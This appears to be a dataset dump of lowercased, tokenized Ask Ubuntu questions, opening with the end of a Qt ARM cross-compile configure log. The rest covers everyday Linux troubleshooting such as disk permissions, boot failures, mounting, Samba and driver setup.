-i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o sqlite2.o sqlite2.cpp sqlite2.cpp:42:20 : fatal error : sqlite.h : no such file or directory compilation terminated . make : *** [ sqlite2.o ] error 1 sqlite2 disabled . tds auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o tds.o tds.cpp tds.cpp:42:22 : fatal error : sybfront.h : no such file or directory compilation terminated . make : *** [ tds.o ] error 1 tds disabled . nis auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o nis.o nis.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o nis nis.o -lnsl nis enabled . cups auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o cups.o cups.cpp cups.cpp:42:23 : fatal error : cups/cups.h : no such file or directory compilation terminated . make : *** [ cups.o ] error 1 cups disabled . posix iconv auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o iconv.o iconv.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o iconv iconv.o posix iconv enabled . d-bus auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o dbus.o dbus.cpp dbus.cpp:43:23 : fatal error : dbus/dbus.h : no such file or directory compilation terminated . make : *** [ dbus.o ] error 1 d-bus disabled . glib auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o glib.o glib.cpp glib.cpp:44:18 : fatal error : glib.h : no such file or directory compilation terminated . make : *** [ glib.o ] error 1 glib disabled . icu auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o icu.o icu.cpp icu.cpp:42:28 : fatal error : unicode/utypes.h : no such file or directory compilation terminated . make : *** [ icu.o ] error 1 icu disabled . pulseaudio auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o pulseaudio.o pulseaudio.cpp pulseaudio.cpp:42:30 : fatal error : pulse/pulseaudio.h : no such file or directory compilation terminated . make : *** [ pulseaudio.o ] error 1 pulseaudio disabled . opengl auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o opengldesktop.o opengldesktop.cpp opengldesktop.cpp:45:19 : fatal error : gl/gl.h : no such file or directory compilation terminated . make : *** [ opengldesktop.o ] error 1 opengl disabled . opengl es 2.x auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o opengles2.o opengles2.cpp opengles2.cpp:45:25 : fatal error : gles2/gl2.h : no such file or directory compilation terminated . make : *** [ opengles2.o ] error 1 opengl es 2.x disabled . fontconfig auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o fontconfig.o fontconfig.cpp fontconfig.cpp:42:22 : fatal error : ft2build.h : no such file or directory compilation terminated . make : *** [ fontconfig.o ] error 1 fontconfig disabled . libudev auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o libudev.o libudev.cpp libudev.cpp:42:21 : fatal error : libudev.h : no such file or directory compilation terminated . make : *** [ libudev.o ] error 1 libudev disabled . evdev auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o evdev.o evdev.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o evdev evdev.o evdev enabled . xlib auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o xlib.o xlib.cpp xlib.cpp:42:22 : fatal error : x11/xlib.h : no such file or directory compilation terminated . make : *** [ xlib.o ] error 1 xlib disabled . xrender auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o xrender.o xrender.cpp xrender.cpp:42:22 : fatal error : x11/xlib.h : no such file or directory compilation terminated . make : *** [ xrender.o ] error 1 xrender disabled . linuxfb auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o linuxfb.o linuxfb.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o linuxfb linuxfb.o linuxfb enabled . kms auto-detection ... ( ) project error : package libdrm not found make : *** no targets specified and no makefile found . stop . kms disabled . egl auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o egl.o egl.cpp egl.cpp:42:21 : fatal error : egl/egl.h : no such file or directory compilation terminated . make : *** [ egl.o ] error 1 egl disabled . freetype auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o freetype.o freetype.cpp freetype.cpp:42:22 : fatal error : ft2build.h : no such file or directory compilation terminated . make : *** [ freetype.o ] error 1 freetype disabled . stl auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o stltest.o stltest.cpp stltest.cpp : in function 'int main ( ) ' : stltest.cpp:136:13 : warning : variable 'first ' set but not used [ -wunused-but-set-variable ] stltest.cpp:138:16 : warning : variable 'second ' set but not used [ -wunused-but-set-variable ] stltest.cpp:109:9 : warning : variable 'v1size ' set but not used [ -wunused-but-set-variable ] stltest.cpp:111:9 : warning : variable 'v1capacity ' set but not used [ -wunused-but-set-variable ] stltest.cpp:115:10 : warning : variable 'v1notfound ' set but not used [ -wunused-but-set-variable ] stltest.cpp:119:10 : warning : variable 'v1found ' set but not used [ -wunused-but-set-variable ] stltest.cpp:124:9 : warning : variable 'v2size ' set but not used [ -wunused-but-set-variable ] stltest.cpp:132:9 : warning : variable 'm1size ' set but not used [ -wunused-but-set-variable ] stltest.cpp:142:9 : warning : variable 'm2size ' set but not used [ -wunused-but-set-variable ] stltest.cpp:146:9 : warning : unused variable 'n ' [ -wunused-variable ] arm-none-linux-gnueabi-g++ -wl , -o1 -o stl stltest.o stl enabled . posix clock_gettime ( ) auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o clock-gettime.o clock-gettime.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o clock-gettime clock-gettime.o -lrt posix clock_gettime ( ) enabled . posix monotonic clock auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o clock-monotonic.o clock-monotonic.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o clock-monotonic clock-monotonic.o -lrt posix monotonic clock enabled . mremap auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o mremap.o mremap.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o mremap mremap.o mremap enabled . getaddrinfo auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o getaddrinfotest.o getaddrinfotest.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o getaddrinfo getaddrinfotest.o getaddrinfo enabled . inotify auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o inotifytest.o inotifytest.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o inotify inotifytest.o inotify enabled . ipv6 interface name auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o ipv6ifname.o ipv6ifname.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o ipv6ifname ipv6ifname.o ipv6 interface name enabled . getifaddrs auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o getifaddrs.o getifaddrs.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o getifaddrs getifaddrs.o getifaddrs enabled . openssl auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o openssl.o openssl.cpp openssl.cpp:42:30 : fatal error : openssl/opensslv.h : no such file or directory compilation terminated . make : *** [ openssl.o ] error 1 openssl disabled . pcre auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o pcre.o pcre.cpp pcre.cpp:42:18 : fatal error : pcre.h : no such file or directory compilation terminated . make : *** [ pcre.o ] error 1 pcre disabled . openvg auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o openvg.o openvg.cpp openvg.cpp:48:23 : fatal error : vg/openvg.h : no such file or directory compilation terminated . make : *** [ openvg.o ] error 1 openvg disabled . openvg auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o openvg.o openvg.cpp openvg.cpp:48:23 : fatal error : vg/openvg.h : no such file or directory compilation terminated . make : *** [ openvg.o ] error 1 openvg disabled . openvg ( lc includes ) auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -dqt_lower_case_vg_includes -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o openvg.o openvg.cpp openvg.cpp:46:23 : fatal error : vg/openvg.h : no such file or directory compilation terminated . make : *** [ openvg.o ] error 1 openvg ( lc includes ) disabled . openvg ( lc includes ) auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -dqt_lower_case_vg_includes -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o openvg.o openvg.cpp openvg.cpp:46:23 : fatal error : vg/openvg.h : no such file or directory compilation terminated . make : *** [ openvg.o ] error 1 openvg ( lc includes ) disabled . alsa auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o alsatest.o alsatest.cpp alsatest.cpp:42:28 : fatal error : alsa/asoundlib.h : no such file or directory compilation terminated . make : *** [ alsatest.o ] error 1 alsa disabled . javascriptcore-jit auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o hwcap_test.o hwcap_test.cpp hwcap_test.cpp:43:5 : warning : unused parameter 'argc ' [ -wunused-parameter ] hwcap_test.cpp:43:5 : warning : unused parameter 'argv ' [ -wunused-parameter ] arm-none-linux-gnueabi-g++ -wl , -o1 -o javascriptcore-jit hwcap_test.o javascriptcore-jit enabled . testing size of pointers ... ( /opt/qt-everywhere-opensource-src-5.0.2/qtbase/mkspecs/linux-arm-gnueabi-g++ yes /opt/qt-everywhere-opensource-src-5.0.2/qtbase /opt/qt-everywhere-opensource-src-5.0.2/qtbase ) rm -f ptrsizetest.o rm -f *~ core *.core arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o ptrsizetest.o ptrsizetest.cpp ptrsizetest.cpp : in function 'int main ( int , char** ) ' : ptrsizetest.cpp:59:12 : error : 'pointersize ' is not a member of 'qpointersizetest < 4 > ' make : *** [ ptrsizetest.o ] error 1 pointer size : 4 building on : linux-g++ building for : linux-arm-gnueabi-g++ architecture : arm , features : host architecture : i386 , features : platform notes : - also available for linux : linux-kcc linux-icc linux-cxx qmake vars ... ... ... . styles += mac fusion windows defines += qt_no_libudev defines += qt_no_xcb precompiled_dir = .pch/release-shared objects_dir = .obj/release-shared moc_dir = .moc/release-shared rcc_dir = .rcc/release-shared ui_dir = .uic/release-shared sql-drivers = sql-plugins = sqlite qmake switches ... ... ... build ... ... ... ... ... ... libs examples configuration ... ... ... . cross_compile qpa largefile precompile_header pcre minimal-config small-config medium-config large-config full-config no-pkg-config evdev linuxfb c++11 accessibility shared qpa reduce_exports reduce_relocations clock-gettime clock-monotonic mremap getaddrinfo ipv6ifname getifaddrs inotify png freetype zlib nis iconv rpath concurrent audio-backend v8 v8snapshot release debug ... ... ... ... ... ... no c++11 support ... ... ... . yes pkg-config ... ... ... ... . no qt d-bus module ... ... .. no qt concurrent code ... .. yes qt gui module ... ... ... . yes qt widgets module ... ... yes javascriptcore jit ... .. to be decided by javascriptcore qml debugging ... ... ... . yes pch support ... ... ... ... yes iwmmxt support ... ... ... no neon support ... ... ... .. no ipv6 ifname support ... . yes getaddrinfo support ... . yes getifaddrs support ... .. yes accessibility ... ... ... . yes nis support ... ... ... ... yes cups support ... ... ... .. no iconv support ... ... ... . yes glib support ... ... ... .. no gstreamer support ... ... no pulseaudio support ... .. no large file support ... .. yes gif support ... ... ... ... plugin jpeg support ... ... ... .. plugin ( qt ) png support ... ... ... ... yes ( qt ) zlib support ... ... ... .. yes session management ... .. auto libudev support ... ... .. no use system proxies ... .. no opengl support ... ... ... no openvg support ... ... ... no xshape support ... ... ... auto xvideo support ... ... ... auto xsync support ... ... ... . auto xinerama support ... ... . runtime xcursor support ... ... .. runtime xfixes support ... ... ... runtime xrandr support ... ... ... runtime xi support ... ... ... ... . runtime xi2 support ... ... ... ... auto mit-shm support ... ... .. auto fontconfig support ... .. no xkb support ... ... ... ... auto gtk theme support ... ... no sqlite support ... ... ... plugin ( qt ) openssl support ... ... .. no alsa support ... ... ... .. no libicu support ... ... ... no pcre support ... ... ... .. qt xcb support ... ... ... ... no xrender support ... ... .. no eglfs support ... ... ... . no directfb support ... ... . no linuxfb support ... ... .. yes kms support ... ... ... ... no could not find qmake configuration file mkspecs/linux-arm-gnueabi-g++. > i have changed the qmake.conf file as per according to my requirement . i am not able to cross compile it . please help .
333278	e-commerce and self cert ssl	guys whats the best and the fastest way to get an ssl cert onto your site ? i have looked at self certs , are they any good ? i currently trying to get my first website complete [ tobots.co.uk ] and it uses paypal for secure payments which is fine for the supply export site to the uk . next i working on a full e-commerce shop , i will be using the woocommerce in wordpress . my server is ubuntu 12.04 without lamp stack , i installed apache2 php db etc i think i have apache set up for vertual hosts so therefore instead of using one installation of wordpress for lots of sites , i will use other installs to keep the sites more secure and away from each other , or do you think i being paranoid ? any answers on e-commerce guys much appreciated
333287	external hard disk read only	i have got an external hard disk toshiba 1tb usb 3 , the permission is always read only . fdisk -l ( output ) : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf2198b37 device boot start end blocks id system /dev/sda1 * 2046 362369023 181183489 5 extended /dev/sda3 362371072 976771071 307200000 7 hpfs/ntfs/exfat /dev/sda5 2048 976895 487424 83 linux /dev/sda6 978944 362369023 180695040 83 linux disk /dev/sdb : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xeba6fb57 device boot start end blocks id system /dev/sdb1 16065 312576704 156280320 f w95 ext 'd ( lba ) /dev/sdb5 16128 312573708 156278790+ 7 hpfs/ntfs/exfat disk /dev/sdc : 1000.2 gb , 1000204885504 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525167 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x297c35de device boot start end blocks id system /dev/sdc1 63 1953520064 976760001 7 hpfs/ntfs/exfat how can i change the owner and permission of this hard drive , am not able do anything ! ! !
333293	how to get back root access ? ( rootrechte bekommen ? )	translation : i use xubuntu and have deleted my admin account . after i had created a new one which also had administrative rights . i did that becauseof some sound problems which are now gone . now the shell tells me that i do n't have root privileges . so how do i get my root back ? original german text : ich benutze xubuntu und habe meinen account gelรถscht ( ich war administrator ) , nachdem ich ich einen neuen erstellt hatte , der auch administrationsrechte hatte . das alles habe ich gemacht , weil ich audioprobleme hatte , die nun auch gelรถst sind . jetzt sagt mir die shell aber , ich habe keine rootrechte . was soll ich denn jetzt machen ? ? ?
333298	how can i gain access to the contents of my password-protected rar files ?	i am using ubuntu 13.04 . before upgrading it i backup my files and when i installed and upgraded my ubuntu to 13.04 i tried to restore my files but they were in password-encrypted rar files and i forgot the password . i searched in web and tried many windows applications through wine . but error messages flashed `` deficiency in wine . '' so i searched the web for ubuntu softwares and found john the ripper but the problem is , i do n't understand how to use it . and i am not aware of how to browse the directories from terminal .
333299	ubuntu freezes at boot / many trouble installing ubuntu 13.04	i have many trouble installing ubuntu gnome 13.04 ( the same holds for ubuntu 12.04 ) on my new desktop pc which i will describe in the following . hardware processor : intel core i5-4570 mainboard : gigabyte ga-h87-hd3 ram : 8gb g.skill 1333mhz cl9 graphics card : gigabyte geforce gtx 660 oc hdd : seagate barracuda 7200.14 1000gb problems / what i have done so far i installed ubuntu gnome 13.04 next to my windows 7 partition via ubuntu live usb problem : grub did not load . instead windows 7 boots . i used boot-repair to install grub correctly . here is the output . problem : grub loads and i can select ubuntu for booting , but then my monitor turns off and nothing happens . i replaced the grub boot parameters `` quiet splash '' by `` text nomodeset '' problem : ubuntu boots , but x does not start . instead , i get access to the shell . i executed `` apt-get dist-upgrade '' , installed `` nvidia-current '' and the ubuntu mainline kernels `` v3.5-quantal '' and `` v3.10-saucy '' for testing . problem : nothing changed . i tried running `` startx '' and `` service gdm start '' . problem : ubuntu freezes completely . i have no idea what to do now , because ubuntu does not show any error at booting . it just does not finish booting . any help would be greatly appreciated !
333303	installing ubuntu 12.04 on mac w/ unbootable mac os x	i read that installing ubuntu on macs does something bad with some efi ( ? ) thing so it get unusable but my mac cant boot of mac os x so i cant fix it and install ubuntu , what do i do ?
333307	ubuntu desktop shifted to right	i am using ubuntu 12.04 ( precise ) kernel : 3.5.0-18-generic i am encountering a strange problem , my whole desktop has shifted to right . this happened after i restored my system , i was getting a blank screen earlier . ( something is better than nothing ) . for some reason it also shows my display as laptop . running xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 0.0* 800x600 0.0 640x480 0.0 running lspci lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0102 ] ( rev 09 ) my display on window supports maximum of 1366*768 . i do not want to reinstall everything please help . it is cycled around as mentioned by eliah kagan for correcting my blank screen issue i edited my grub file i edited this line and added nomodeset , without it screen gets all grained up . grub_cmdline_linux_default= '' quiet splash nomodeset `` when i boot from live cd also i get the same shifted screen update 2 tried booting from live cd with 11.04 same issue update 3 .xsession-errors file : http : //pastebin.com/uvesgna8 update 4 xrandr -q | grep -w connected xrandr : failed to get size of gamma for output default default connected 1024x768+0+0 0mm x 0mm
333311	nautilus icons are missing on kde	i really like nautilus file manager , but on kde the icons are missing . it works good on unity and gnome . if i start nautilus from terminal ( writting nautilus ) i see the following logs : $ nautilus initializing nautilus-dropbox 1.4.0 ( nautilus:29369 ) : gtk-warning ** : theme directory apps/22 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/24 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/32 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/48 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/64 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/128 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/192 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory of theme unity-webapps has no size field ( nautilus:29369 ) : glib-gobject-critical ** : g_object_set : assertion `g_is_object ( object ) ' failed ( nautilus:29369 ) : glib-gobject-critical ** : g_object_set : assertion `g_is_object ( object ) ' failed ( nautilus:29369 ) : gtk-warning ** : theme directory apps/22 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/24 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/32 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/48 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/64 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/128 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory apps/192 of theme unity-webapps has no size field ( nautilus:29369 ) : gtk-warning ** : theme directory of theme unity-webapps has no size field nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . and a screen shot : how can i fix them ? i also see `` x '' icons in other applications running under kde .
333313	need help fixing hard drive mounting	this issue is about internal hard drives . not usb drives . during my time using ubuntu i have noticed that after updates , or sometimes vicariously at the whim of my system , my hard drives seem to change where they decide to mount in semi-random fashion . this is wrecking havoc with my symlinks and is quite frankly getting very tiresome . as i understand it 13.04 should mount my internal hdd at /media/ [ drive ] and my removable drives at /media/ [ username ] / [ drive ] . well now suddenly my system has decided to mount all my drives at /media/ [ username ] / [ drive ] . i used to be able to open the file manager and unmount them and when i remounted them they would 'fix ' themselves and remount at /media/ [ drive ] . i can no longer do that for some unknown reason . my internal drives now insist on being mounted at /media/ [ username ] / [ drive ] . i have looked at my /ect/fstab and at the information in 'disks ' ( see is there a program to mount all of my drives automatically ? ) and none of it matches . also in 'disks ' my drives are set to mount automatically but they do n't . i always have to manually mount them . to fix that i found https : //help.ubuntu.com/community/automaticallymountpartitions . plus 'disks ' says that my disks are mounting at /mnt/ [ uuid ] which they are not doing . i am now thoroughly confused . do i use disks or fstab ? do i put the automount in disks or in the startup applications . how do i get them to mount by uuid in the correct location . there are too many methods and none match and none seem to talk to one another . is there a definitive way , preferably with a gui as i am not a cli comfortable type , that i can use to fix this mess and get all my drives to automount on startup and mount in the correct place consistently ? this is driving me nuts ! here is the info as per my system : fstab : proc /proc proc nodev , noexec , nosuid 0 0 uuid=68bff081-9b80-4d38-8383-8dcf9f77850c / ext4 errors=remount-ro 0 1 uuid=ada89abc-d3d6-4f5c-a4ed-176295a20842 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 now most of this is gibberish to me . i can pull out of this is that it is my root drive , the swap partition and a floppy drive . i have no issues with this one . but my other 3 drives are not here ! disks : /dev/sda mount point : /mnt/be44c6f844c6b307 identify as : /dev/disk/by-uuid/be44c6f844c6b307 nosuid , nodev , nofail , x-gvfs-show mount on startup checked yes ( which it does not do ) automatic mount options set to on . ( which it does not do ) /dev/sdb mount point : / identify as : uuid=c642a00c-410d-4463-9da4-7c002541b81a errors=remount-ro mount on startup checked yes ( which it does do ) automatic mount options set to off . ( but it does mount at startup automatically ) this is my root filesystem and matches my fstab so i guess that 's why it automounts at startup . /dev/sdc mount point : /mnt/c642a00c-410d-4463-9da4-7c002541b81a identify as : /dev/disk/by-uuid/c642a00c-410d-4463-9da4-7c002541b81a nosuid , nodev , nofail , x-gvfs-show mount on startup checked yes ( which it does not do ) automatic mount options set to on . ( which it does not do ) /dev/sdd mount point : /mnt/68787d0e787cdc6e identify as : /dev/disk/by-uuid/68787d0e787cdc6e nosuid , nodev , nofail , x-gvfs-show mount on startup checked yes ( which it does not do ) automatic mount options set to on . ( which it does not do ) i also added these drives to 'startup applications ' each with the following commands as per https : //help.ubuntu.com/community/automaticallymountpartitions : /usr/bin/udisks -- mount /dev/disk/by-uuid/be44c6f844c6b307 /usr/bin/udisks -- mount /dev/disk/by-uuid/68787d0e787cdc6e /usr/bin/udisks -- mount /dev/disk/by-uuid/c642a00c-410d-4463-9da4-7c002541b81a devices sda , sdc , sdd are all listed as mounting at /mnt/ [ drive-uuid ] ( system wide ) but are actually mounting at /media/ [ username ] / [ drive ] ( removable media ) instead of /media/ [ drive ] ( per-user ) . so which of these three should they mount at and how do i get them to actually do it ? system wide is fine but i would have to change 200 or so symlinks . is there a way to do that in bulk ? please help , thanks .
333316	nvidia 325.15 and bumblebee	i will be receiving a laptop with an nvidia gtx 780m ( so , unfortunately , optimus ) and i was wondering if it was possible , on ubuntu 13.04 , to make it run with the newest nvidia drivers ( 325.15 ) + bumblebee or if the 325.15 is still arch linux only . if the answer is `` yes , it 's quite possible '' i 'd like to know which repo i should use for such a feat . thank you very much for your answers and time : i 'd really appreciate ubuntu and its simplicity and i would bother me very much to have to switch to arch linux for just a driver .
333321	get ip of remote windows machine from hostname	i have a headless windows 7 box i 'm trying to access using vnc viewer from my ubuntu gnome raring machine . previously , when i was running linux mint , i could do this no problem ... but i ca n't remember the ip of the windows box . when i try to browse the network in nautilus , i can see the windows box hostname ( e.g . browse network > windows network > workgroup > hostname ) , but i ca n't figure out how to find its ip ! what 's the best way ? thanks .
333322	how to disable samba on ubuntu 12.04 ?	i need to disable ( not uninstall ) samba on ubuntu 12.04 server but i cant see any link in rc2.d directory . how samba is starting after reboot ? how to disable smbd/nmbd daemon ? ? what is winbind ? root @ newnagios : ~ # ll /etc/rc2.d/ total 12 drwxr-xr-x 2 root root 4096 aug 15 16:23 ./ drwxr-xr-x 101 root root 4096 aug 16 12:13 ../ -rw-r -- r -- 1 root root 677 jul 26 2012 readme lrwxrwxrwx 1 root root 17 aug 4 20:34 s20postfix - > ../init.d/postfix* lrwxrwxrwx 1 root root 15 aug 12 15:55 s20snmpd - > ../init.d/snmpd* lrwxrwxrwx 1 root root 17 aug 4 20:34 s20winbind - > ../init.d/winbind* lrwxrwxrwx 1 root root 13 aug 5 12:42 s23ntp - > ../init.d/ntp* lrwxrwxrwx 1 root root 15 aug 4 18:07 s25mdadm - > ../init.d/mdadm* lrwxrwxrwx 1 root root 15 aug 4 20:34 s50rsync - > ../init.d/rsync* lrwxrwxrwx 1 root root 19 aug 4 20:34 s70dns-clean - > ../init.d/dns-clean* lrwxrwxrwx 1 root root 18 aug 4 20:34 s70pppd-dns - > ../init.d/pppd-dns* lrwxrwxrwx 1 root root 14 aug 4 22:03 s75sudo - > ../init.d/sudo* lrwxrwxrwx 1 root root 17 aug 4 20:34 s91apache2 - > ../init.d/apache2* lrwxrwxrwx 1 root root 21 aug 4 20:35 s99grub-common - > ../init.d/grub-common* lrwxrwxrwx 1 root root 18 aug 4 18:06 s99ondemand - > ../init.d/ondemand* lrwxrwxrwx 1 root root 18 aug 4 18:06 s99rc.local - > ../init.d/rc.local*
333328	requesting key 9a690089 from hkp server keyserver.ubuntu.com	i use ubuntu 12.04 , and now i am installing latex ( texlive2012 ) , using the command : sudo apt-add-repository ppa : texlive-backports/ppa . i properly entered the password and pressed enter . after two or three seconds i got this error message : gpg : keyring `/tmp/tmpakm6i_/secring.gpg ' created gpg : keyring `/tmp/tmpakm6i_/pubring.gpg ' created gpg : requesting key 9a690089 from hkp server keyserver.ubuntu.com gpgkeys : key d8bbae0d829e4b3269cc39043e07f5b89a690089 not found on keyserver gpg : no valid openpgp data found . gpg : total number processed : 0 recv failed how do i resolve this error ?
333331	command and use the result of it to run another command	i want to make ls and cd to first or second directory it shows , whatever name the first one or the second would be ( dir1 or dir2 , in this case ) : $ ls { + some command like | grep which would get me to dir1 or dir2 or any other dir i want to } dir1 dir2 dir3 dir4 is it possible ? update : i want to do that in the terminal without creating an external script .
333336	upstart job wo n't start	i have a simple upstart job : - /etc/init/hmastart.conf i want to test it , so i run : - service hmastart start but i receive the following error : - start : unknown job : hmastart i get the same error message if i try : start hmastart i have also tried adding sudo to the beginning , but i get the same error . here is my script description `` starts hma vpn '' author `` me < myself @ i.com > '' start on runlevel [ 2345 ] stop on runlevel [ 016 ] respawn expect fork exec sudo /usr/local/bin/hma-vpn -p tcp london my conf file has the same permissions as all the other conf files in /etc/init . could someone please tell me why this script can not be found/run ? many thanks in advance ! ! `
